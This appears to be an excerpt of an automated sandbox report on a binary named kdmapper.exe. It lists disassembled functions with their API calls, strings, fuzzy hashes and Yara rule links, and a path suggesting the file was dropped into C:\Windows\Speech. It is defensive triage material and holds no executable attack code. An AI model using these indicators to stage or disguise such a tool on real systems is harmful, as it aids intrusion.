Instruction Fuzzy Hash: 54F06232912200AFCBA4DB68E586C4A7BFBAE10721B54281DF108D7753CF71FC80CA58

Function 00631FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00631FE5
_wcslen.LIBCMT ref: 00631FF6
_wcslen.LIBCMT ref: 00632006
_wcslen.LIBCMT ref: 00632014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0062B371,?,?,00000000,?,?,?), ref: 0063202F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: e4b81658a7300a453e859007cce783c29f9fbb6987c632037bfc56dbfc2ec075
Instruction ID: 9d4d77bca75702d56d0a1bdc0a9943f3d3c4145502ccf2abac22cf7a8b5784e3
Opcode Fuzzy Hash: e4b81658a7300a453e859007cce783c29f9fbb6987c632037bfc56dbfc2ec075
Instruction Fuzzy Hash: 10F06D32008124BBCF265F50EC09D8E3F27EB40B70F11800AF61A5A161CB7296A5D6D4

Function 0063B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
TranslateMessage.USER32(?), ref: 0063B5AC
DispatchMessageW.USER32(?), ref: 0063B5B6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 1f84bde1faea2dc0647cf6a97feb966a9e8b3244667a248419be5928a4de0cf5
Instruction ID: 8b5064e8b7107737e21fa4efa707a776566408fb85d49ae75e8a2ff1cd08be07
Opcode Fuzzy Hash: 1f84bde1faea2dc0647cf6a97feb966a9e8b3244667a248419be5928a4de0cf5
Instruction Fuzzy Hash: C1F0BD71A0122ABBCB209FE5DC4CDDB7FADEE057A17005615B505D2210EB74D605CBF0

Function 006315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 006317BC
_swprintf.LIBCMT ref: 0063186B

Strings

%s: %s, xrefs: 006317CB
%ls, xrefs: 00631641, 00631657

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e21fcfceb15a528f540ab104b92e8c7e38e3a443d69f9e42ea3b2a84c455a8af
Instruction ID: ba38bb50922e906a233f8ddca91e8e72b5d1aa97119f5244bcc56d97ccc75878
Opcode Fuzzy Hash: e21fcfceb15a528f540ab104b92e8c7e38e3a443d69f9e42ea3b2a84c455a8af
Instruction Fuzzy Hash: E151E935288300F6E7211AE48D47F757677AB07B04F28851BF3966C4E1C9B3A4626BDE

Function 00647F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Speech\kdmapper.exe,00000104), ref: 00647FAE
_free.LIBCMT ref: 00648079
_free.LIBCMT ref: 00648083

Strings

C:\Windows\Speech\kdmapper.exe, xrefs: 00647FA5, 00647FAC, 00647FDB, 00648013

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Speech\kdmapper.exe
API String ID: 2506810119-2414484506
Opcode ID: 8709c1a257bd250d8bacce9e7a41600c73f5e8a56981dda8cf0246ecc5ee3746
Instruction ID: 1fbdba3bdc9ec291859b83693e770ae35f899a4824ed79869abed3ade00ebc65
Opcode Fuzzy Hash: 8709c1a257bd250d8bacce9e7a41600c73f5e8a56981dda8cf0246ecc5ee3746
Instruction Fuzzy Hash: 3F319FB1A00219AFDB21DF99D880D9EBBFEEF95710F10416AF90497211DB718E85CB61

Function 006431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006431FB
_abort.LIBCMT ref: 00643306

Strings

MOC, xrefs: 0064320D
RCC, xrefs: 00643215

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: da4c849f5b6e1b816ac37d9fb8892e6304db530ebc579b1b0d6c097a4f8a809c
Instruction ID: 3042e0e3e3d8f8696826629a63a082d6c5a409ad05472bd4277bade29eff033d
Opcode Fuzzy Hash: da4c849f5b6e1b816ac37d9fb8892e6304db530ebc579b1b0d6c097a4f8a809c
Instruction Fuzzy Hash: D9416A71900219AFCF16DFA4CD82AEEBBB6BF48304F148059F90467312D375AA50DB54

Function 00627401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00627406

Part of subcall function 00623BBA: __EH_prolog.LIBCMT ref: 00623BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 006274CD

Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00

Strings

SeSecurityPrivilege, xrefs: 0062744B
SeRestorePrivilege, xrefs: 00627460

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: ec1171b78b248b97bbf9d6d49bcf8c7b00366be5c793d2e6cd0bbe0d04c17fe6
Instruction ID: 631cd627789fa7934af3ff4bc0f3e41f95da6eae54f5d0f33bb67a4b4768a462
Opcode Fuzzy Hash: ec1171b78b248b97bbf9d6d49bcf8c7b00366be5c793d2e6cd0bbe0d04c17fe6
Instruction Fuzzy Hash: B131B371D04668AADF51EFA4EC45FEEBBBBAF09304F044019F405B7281CB748A448F64

Function 0063AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

EndDialog.USER32(?,00000001), ref: 0063AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0063ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0063ADC2

Strings

ASKNEXTVOL, xrefs: 0063AD28

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 171f312f5895dd561685eda9224176aeb6aeec2876e611c5e9e51b7d7046e0e2
Instruction ID: 816a507842e08c41166b409bda788dd1f280cbfb3265ae19edc76e1ee34deeb5
Opcode Fuzzy Hash: 171f312f5895dd561685eda9224176aeb6aeec2876e611c5e9e51b7d7046e0e2
Instruction Fuzzy Hash: C611CB32640210BFD7519FE8ED45FAA776FEF4B742F000214F281DF6A0C7619906ABA6

Function 0063DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,000303EC,0063B270,?,?), ref: 0063DE18

Strings

xzg, xrefs: 0063DE28
GETPASSWORD1, xrefs: 0063DE0D
rc, xrefs: 0063DDDC

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$rc$xzg
API String ID: 665744214-3096991722
Opcode ID: 7dd2862ec6f1325e87a3c22cb564263a580648a691e7ebd55421773df1577d00
Instruction ID: 79a3a79ca48b7d8adad787cd971a34b18da9538d3c17288e43ca3d9cd631ea90
Opcode Fuzzy Hash: 7dd2862ec6f1325e87a3c22cb564263a580648a691e7ebd55421773df1577d00
Instruction Fuzzy Hash: 2E110832600254AADB11DE34BC05BEF3B9BAB05751F144024FE49AB191CAB4AD44D7A4

Function 0062D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0062D954
_strncpy.LIBCMT ref: 0062D99A

Part of subcall function 00631DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00661030,00000200,0062D928,00000000,?,00000050,00661030), ref: 00631DC4

Strings

@%s, xrefs: 0062D93E
$%s, xrefs: 0062D949

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 521bd3a98a642cf896befadb96cc12dfb8c9e309173519af1fae108299d87302
Instruction ID: 683fa640d823f0c73b6497c6eaf6d137addda1a9ace11349f7c4528a05566cfc
Opcode Fuzzy Hash: 521bd3a98a642cf896befadb96cc12dfb8c9e309173519af1fae108299d87302
Instruction Fuzzy Hash: 0521A532C40658AEDF21DFA4DC05FDE7BAEAF05704F140015F91096292E272D689CF91

Function 00630E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0062AC5A,00000008,?,00000000,?,0062D22D,?,00000000), ref: 00630E9F

Strings

Thread pool initialization failed., xrefs: 00630EB7

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: a3db70a9a640379404f41258a29f77550b56f45852cfc7c99624e22e6f631ecc
Instruction ID: f570e32b0e296b9f71793dc1bd1e4330e19dcfe965c2b0411ab1b1406d11fd50
Opcode Fuzzy Hash: a3db70a9a640379404f41258a29f77550b56f45852cfc7c99624e22e6f631ecc
Instruction Fuzzy Hash: AD1191B17007089FD3219F66DC949A7FBEEEB55754F104C2EF1DAC2300DA7159448BA4

Function 0062124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0062125D

Strings

2c, xrefs: 00621292
(c, xrefs: 006212A3
A, xrefs: 00621285

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Malloc
String ID: (c$2c$A
API String ID: 2696272793-1818421493
Opcode ID: d40d1b4891bc3d840ce90592474ab05e408ad874fddc7dd53b6d199a7ace6bdb
Instruction ID: 5abb3546f0371d431ea251a4942e929705ca1f96846d04b0565cc788640c9dfe
Opcode Fuzzy Hash: d40d1b4891bc3d840ce90592474ab05e408ad874fddc7dd53b6d199a7ace6bdb
Instruction Fuzzy Hash: 50011771901229ABCB14CFA4E848AEEBBF9EF09700F10416AE906E7340D734DB40CFA4

Function 0063DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0063DD1C, 0063DD50
RENAMEDLG, xrefs: 0063DD31

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 5c098a37b346f776148bad61baedd9c47599d4a9076189ca29dccb67120a8ccc
Instruction ID: 4b2d1eecca65e8fc1f0b401657336a8f78a061118e7ed55dd0fd201d4d516a64
Opcode Fuzzy Hash: 5c098a37b346f776148bad61baedd9c47599d4a9076189ca29dccb67120a8ccc
Instruction Fuzzy Hash: 6B018F76A04245AFDB118F69FC44A9A7FEBFB49398F041525F806D3330CA719890EBE1

Function 00621316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0062E2E8: _swprintf.LIBCMT ref: 0062E30E
Part of subcall function 0062E2E8: _strlen.LIBCMT ref: 0062E32F
Part of subcall function 0062E2E8: SetDlgItemTextW.USER32(?,0065E274,?), ref: 0062E38F
Part of subcall function 0062E2E8: GetWindowRect.USER32(?,?), ref: 0062E3C9
Part of subcall function 0062E2E8: GetClientRect.USER32(?,?), ref: 0062E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0062135A
SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

Strings

0, xrefs: 00621319
c, xrefs: 0062134A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: c$0
API String ID: 2622349952-1042384022
Opcode ID: 7029ef9f3af264ec66f6a8894f01e8c3ab04f193d1cb41f2c6b7ac3a36c483e1
Instruction ID: 6fcc6f44aab4ae7c5f942fa096a215fc44e04698727e50933e31a58865a79207
Opcode Fuzzy Hash: 7029ef9f3af264ec66f6a8894f01e8c3ab04f193d1cb41f2c6b7ac3a36c483e1
Instruction Fuzzy Hash: 76F0A4311086A8B7DF154F60EC0DBE93F5BAF22784F094214FC8598691DB75CA91DF10

Function 00649A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00649AA9
__alldvrm.LIBCMT ref: 00649CAA
__alldvrm.LIBCMT ref: 00649CCC

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 5b10132e5105f8c908879993669d37d8a5e67c4a004c36bb1e22f4e5397deef1
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: D9A14572A807869FEB21CF28C8917EFBBE6EF52310F1841ADE4859B381C2348941C764

Function 0062A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00627F69,?,?,?), ref: 0062A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00627F69,?), ref: 0062A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00627F69,?,?,?,?,?,?,?), ref: 0062A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00627F69,?,?,?,?,?,?,?,?,?,?), ref: 0062A4C6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 39c69367eafa6693849dc6a3973acbe681460cb48f2f05a807a5c662e21f9ff0
Instruction ID: f05253a0c9edb1f415490c76139002699a0c76d779e09325c3eb4a77accb4f4c
Opcode Fuzzy Hash: 39c69367eafa6693849dc6a3973acbe681460cb48f2f05a807a5c662e21f9ff0
Instruction Fuzzy Hash: E941CD302487A19BE721EEA4ED45BEEBBE6AB81700F04091DB5D0D72C0D6A4DA48DB53

Function 0064C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,006491E0,?,00000000,?,00000001,?,?,00000001,006491E0,?), ref: 0064C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0064CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00646CBE,?), ref: 0064CA70
__freea.LIBCMT ref: 0064CA79

Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8618d9e8ab3105a928b23f1bd634dae2541384d718122798fc98f5e36d015e07
Instruction ID: dda195487ef5ff79bacab8de5196159211cfee12454ac149e5e7040bd75e18b4
Opcode Fuzzy Hash: 8618d9e8ab3105a928b23f1bd634dae2541384d718122798fc98f5e36d015e07
Instruction Fuzzy Hash: 0031AE72A0121AABDF25DF64CC51DEE7BA6EB01720F044128FC04E6350EB35CD90DB90

Function 0063A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0063A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0063A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0063A683
ReleaseDC.USER32(00000000,00000000), ref: 0063A691

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

